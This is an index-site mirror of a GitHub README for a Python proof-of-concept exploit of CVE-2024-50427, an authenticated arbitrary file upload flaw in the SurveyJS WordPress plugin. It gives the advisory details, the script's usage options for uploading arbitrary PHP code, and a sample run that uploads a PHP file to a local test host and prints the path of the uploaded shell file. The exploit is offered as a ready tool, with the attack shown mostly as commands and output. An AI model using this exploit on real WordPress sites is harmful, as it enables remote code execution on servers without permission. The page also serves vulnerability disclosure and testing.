Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-50427
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload
https://github.com/randomrobbiebf/cve-2024-50427
Last synced: about 1 month ago
JSON representation
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-50427
- Owner: RandomRobbieBF
- Created: 2024-11-08T12:24:06.000Z (about 2 months ago)
- Default Branch: main
- Last Pushed: 2024-11-08T12:26:12.000Z (about 2 months ago)
- Last Synced: 2024-11-08T13:30:35.337Z (about 2 months ago)
- Language: Python
- Size: 3.91 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-50427
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload# Description:
The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.9.136. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.```
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs
```How to use
---```
usage: CVE-2024-50427.py [-h] [--code CODE] url username passwordUpload a PHP file to a WordPress site.
positional arguments:
url The URL of the WordPress site (e.g., http://example.com)
username Your WordPress username
password Your WordPress passwordoptions:
-h, --help show this help message and exit
--code CODE PHP code to execute
```POC
---```
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php
```